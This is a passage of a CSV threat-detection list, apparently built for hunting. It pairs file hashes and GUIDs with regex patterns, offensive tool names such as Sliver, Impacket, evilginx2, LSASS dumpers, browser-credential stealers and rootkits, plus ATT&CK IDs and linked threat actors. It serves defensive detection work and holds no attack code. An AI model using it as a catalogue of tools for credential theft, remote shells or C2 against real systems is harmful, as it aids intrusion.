tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22675" "*1b505dc8b0d60061082cb43caa8bc7af56f1b2a5064bc0040f4963b0735004ed*",".{0,1000}1b505dc8b0d60061082cb43caa8bc7af56f1b2a5064bc0040f4963b0735004ed.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22677" "*1B52A3D9-014C-4CBF-BB98-09080D9A8D16*",".{0,1000}1B52A3D9\-014C\-4CBF\-BB98\-09080D9A8D16.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","22678" "*1b578e26adc91f95143cb5c8dcfa9c0baf76923ea2295cc45e2e7a99bd4a763c*",".{0,1000}1b578e26adc91f95143cb5c8dcfa9c0baf76923ea2295cc45e2e7a99bd4a763c.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","#filehash","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","22679" "*1b591c180e6c5221a81921e42b0256b62cec1f1af872624f5fd178d1ed7bd7c6*",".{0,1000}1b591c180e6c5221a81921e42b0256b62cec1f1af872624f5fd178d1ed7bd7c6.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/gitjdm/dumper2020","1","0","#filehash","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","22680" "*1b5b1dcea5728489f0373d6f8f351d69912498c61829ceccf5c5d0233bf0c852*",".{0,1000}1b5b1dcea5728489f0373d6f8f351d69912498c61829ceccf5c5d0233bf0c852.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22681" "*1b609698b6ff63a7b10bc9b656a698ce57b1995ee1f8894673d4e58e16e2a93c*",".{0,1000}1b609698b6ff63a7b10bc9b656a698ce57b1995ee1f8894673d4e58e16e2a93c.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22682" "*1b64535871ba5902d04a803aa1e9f746753e42258c104e81a563a4d6bb10ebf7*",".{0,1000}1b64535871ba5902d04a803aa1e9f746753e42258c104e81a563a4d6bb10ebf7.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22684" "*1b663d586331064566b0896ba3c2d7079a4c4b6b9a4473b634e76655bc36f599*",".{0,1000}1b663d586331064566b0896ba3c2d7079a4c4b6b9a4473b634e76655bc36f599.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22685" "*1b6d6a1a116e8ddaeb7e3dde5dfc285e50004be80e977aa612447275c5930281*",".{0,1000}1b6d6a1a116e8ddaeb7e3dde5dfc285e50004be80e977aa612447275c5930281.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#filehash","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","22687" "*1b789e0e641506e259b2e4e2a64dac2654f224dcaf4d57da0634ce4774eb9b90*",".{0,1000}1b789e0e641506e259b2e4e2a64dac2654f224dcaf4d57da0634ce4774eb9b90.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22689" 
"*1b7ba7d421c730e4f9ab9f954f591dd61899fc06badf9cac8ed821d04e492973*",".{0,1000}1b7ba7d421c730e4f9ab9f954f591dd61899fc06badf9cac8ed821d04e492973.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","22690" "*1b80f6a088f3bfc7f72208fc3ef8a4471e37cc59f4d13c863deac34b51f8692a*",".{0,1000}1b80f6a088f3bfc7f72208fc3ef8a4471e37cc59f4d13c863deac34b51f8692a.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22691" "*1B826591784D6FBFB1BED96065D7EBD9982723D3EEC2386614088AAA4CA84F0D*",".{0,1000}1B826591784D6FBFB1BED96065D7EBD9982723D3EEC2386614088AAA4CA84F0D.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","22692" "*1b87e3a566e015aa71409428ad95cc231860e85bb64396197bb3b511021a7c45*",".{0,1000}1b87e3a566e015aa71409428ad95cc231860e85bb64396197bb3b511021a7c45.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22693" "*1b8ca67716c0928b6e8f6325dc89affc9c312353dfcaea788618c8b50337c857*",".{0,1000}1b8ca67716c0928b6e8f6325dc89affc9c312353dfcaea788618c8b50337c857.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","22695" "*1b91671f55675c1262fa008c5a6f24f7842cb7f14bcf30aed99444d8ea5fed5f*",".{0,1000}1b91671f55675c1262fa008c5a6f24f7842cb7f14bcf30aed99444d8ea5fed5f.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - 
T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22696" "*1b9b3211b26dcb730d47fa8e7bd97a2c3d5bc4b740a1c6c15fb690c87cd12031*",".{0,1000}1b9b3211b26dcb730d47fa8e7bd97a2c3d5bc4b740a1c6c15fb690c87cd12031.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22697" "*1ba34d4d223d6a532c194e578a3efc5e8aeae8bf657223614c502e28d84942cf*",".{0,1000}1ba34d4d223d6a532c194e578a3efc5e8aeae8bf657223614c502e28d84942cf.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","22699" "*1ba38ae7e6c55fd66b21d40178341d18c195991c23044e030c3096746a2e1266*",".{0,1000}1ba38ae7e6c55fd66b21d40178341d18c195991c23044e030c3096746a2e1266.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. 
BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","22700" "*1ba53ac62c21cd1f829f4d4cb0ee06906cd3bfd0cf78da267c3b7d9acfb6d27b*",".{0,1000}1ba53ac62c21cd1f829f4d4cb0ee06906cd3bfd0cf78da267c3b7d9acfb6d27b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22702" "*1BA54A13-B390-47B3-9628-B58A2BBA193B*",".{0,1000}1BA54A13\-B390\-47B3\-9628\-B58A2BBA193B.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","22703" "*1ba866ccd7462b3d78f20e76558f9b7ab94a3f565ed6261c60078de511dfc461*",".{0,1000}1ba866ccd7462b3d78f20e76558f9b7ab94a3f565ed6261c60078de511dfc461.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","22704" 
"*1baa69530af844b454f505e1c21c1459d532efa7a0369cc78296121841355510*",".{0,1000}1baa69530af844b454f505e1c21c1459d532efa7a0369cc78296121841355510.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","22705" "*1BACEDDC-CD87-41DC-948C-1C12F960BECB*",".{0,1000}1BACEDDC\-CD87\-41DC\-948C\-1C12F960BECB.{0,1000}","offensive_tool_keyword","themebleed","Proof-of-Concept for CVE-2023-38146","T1566.001 - T1077 - T1213.002","TA0007 - TA0011 - TA0010","N/A","N/A","Exploitation tool","https://github.com/gabe-k/themebleed","1","0","#GUIDproject","N/A","10","2","196","37","2023-09-13T04:50:29Z","2023-09-13T04:00:14Z","22706" "*1bb41d5d6d3c883be23682ec1d94ee3317c0ab8d5fa2bee3712a5f33c0d6960b*",".{0,1000}1bb41d5d6d3c883be23682ec1d94ee3317c0ab8d5fa2bee3712a5f33c0d6960b.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. 
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","#filehash","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","22707" "*1bc3fc0ecdae8f404c33942914e6f442ea91400bdea77322b318ab576d4050a9*",".{0,1000}1bc3fc0ecdae8f404c33942914e6f442ea91400bdea77322b318ab576d4050a9.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#filehash","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","22708" "*1bc73a13029b5677f070a991cec0ed90f3ebd70bcc0566a4724496eb71792dee*",".{0,1000}1bc73a13029b5677f070a991cec0ed90f3ebd70bcc0566a4724496eb71792dee.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","22709" "*1bc86ec82025ba921af42a51e67f9e273a9a9628778477ad7e28b86f8b3326fb*",".{0,1000}1bc86ec82025ba921af42a51e67f9e273a9a9628778477ad7e28b86f8b3326fb.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22710" "*1bc8fca2c5b410f9c0bbfff18af3dc6295f2a8b8d7c2ba953e282b6a0bc6214c*",".{0,1000}1bc8fca2c5b410f9c0bbfff18af3dc6295f2a8b8d7c2ba953e282b6a0bc6214c.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims 
to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","22711" "*1bd59761e0390b6dee196b67f5cfd3b0dae73cdb5905815cd4ae9d5ae02293f7*",".{0,1000}1bd59761e0390b6dee196b67f5cfd3b0dae73cdb5905815cd4ae9d5ae02293f7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22714" "*1be348a72f9fc11fe85f58866d0deeaf3798b300130493da6907f9d1213a9328*",".{0,1000}1be348a72f9fc11fe85f58866d0deeaf3798b300130493da6907f9d1213a9328.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","22715" "*1be8d887faf0e80185a811e2c3a734117dcd081136d088295356bb5ddc6395be*",".{0,1000}1be8d887faf0e80185a811e2c3a734117dcd081136d088295356bb5ddc6395be.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - 
T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22716" "*1be9af3e46ecda17aed9e3c5c563003b5f1fd31b9833fd85e69e11fb53a6bc4d*",".{0,1000}1be9af3e46ecda17aed9e3c5c563003b5f1fd31b9833fd85e69e11fb53a6bc4d.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#filehash","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","22717" "*1bf68c433eb8684cda13f16146339666983a0b413243a6708e33dce298bdc23f*",".{0,1000}1bf68c433eb8684cda13f16146339666983a0b413243a6708e33dce298bdc23f.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#filehash","N/A","10","9","N/A","N/A","N/A","N/A","22719" "*1bf703bef8ee1927c28ba6691843bf7576dc9f7e3af6c2efdb653695e7163daf*",".{0,1000}1bf703bef8ee1927c28ba6691843bf7576dc9f7e3af6c2efdb653695e7163daf.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22720" 
"*1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E*",".{0,1000}1BF9C10F\-6F89\-4520\-9D2E\-AAF17D17BA5E.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","#GUIDproject","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","22721" "*1bff5a9cb5275afd7b7d4bf2d3087f1b3bf94864c4decf73f1c82922ad646d2f*",".{0,1000}1bff5a9cb5275afd7b7d4bf2d3087f1b3bf94864c4decf73f1c82922ad646d2f.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","22723" "*1c008a8214c1fa6b06500d92a76900314b9f889818d6dae55f274f3a95d874b6*",".{0,1000}1c008a8214c1fa6b06500d92a76900314b9f889818d6dae55f274f3a95d874b6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22724" "*1c00f46dec53547c1aa2faace16e027cd276d5c6ab53abe79e4379d81b09826b*",".{0,1000}1c00f46dec53547c1aa2faace16e027cd276d5c6ab53abe79e4379d81b09826b.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22725" "*1c0a207ce57e860adae1f3c0d7a0cd5c1312467950ada3216ea22b4dca5d42bb*",".{0,1000}1c0a207ce57e860adae1f3c0d7a0cd5c1312467950ada3216ea22b4dca5d42bb.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22728" "*1c0f922ca54295ab3f496fded2eada45fa166e32b34bdefc838ba3919c679208*",".{0,1000}1c0f922ca54295ab3f496fded2eada45fa166e32b34bdefc838ba3919c679208.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22729" "*1c14d0d58efdd3244a1fd4398ef9c65e96bfe4faccc168e7ace84728da908d9e*",".{0,1000}1c14d0d58efdd3244a1fd4398ef9c65e96bfe4faccc168e7ace84728da908d9e.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a 
process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","22730" "*1c267e901a65d142bf532bc0d26926dd9ceaa43e16b48df37c0739ba050a1c50*",".{0,1000}1c267e901a65d142bf532bc0d26926dd9ceaa43e16b48df37c0739ba050a1c50.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","22731" "*1c28d23e9c40b7f247de4c2b2976e69a644c901bf2afa5c78366a11de9fe090e*",".{0,1000}1c28d23e9c40b7f247de4c2b2976e69a644c901bf2afa5c78366a11de9fe090e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22733" "*1c291548b59d3af8b3c225cb7e019b86a3cb706eec437b275528699898bcdb3a*",".{0,1000}1c291548b59d3af8b3c225cb7e019b86a3cb706eec437b275528699898bcdb3a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22734" "*1c309b473a4221fa7bbb5566935f888a7d8cf523ea33c6f7b568c7342f81419a*",".{0,1000}1c309b473a4221fa7bbb5566935f888a7d8cf523ea33c6f7b568c7342f81419a.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download 
records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#filehash","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","22736" "*1c433a8035d4dba34f796841bdd25045167a59c41c716548b00a7439146a48a5*",".{0,1000}1c433a8035d4dba34f796841bdd25045167a59c41c716548b00a7439146a48a5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22738" "*1c4b5a0c298af06402c2aec4c90a3b9a3e0fe79067fcbb8ea13f261e9f3b5405*",".{0,1000}1c4b5a0c298af06402c2aec4c90a3b9a3e0fe79067fcbb8ea13f261e9f3b5405.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22739" "*1c4fd2d2f860350700465103ebe246d2e50c1090d9e12872e4418cac765cae20*",".{0,1000}1c4fd2d2f860350700465103ebe246d2e50c1090d9e12872e4418cac765cae20.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 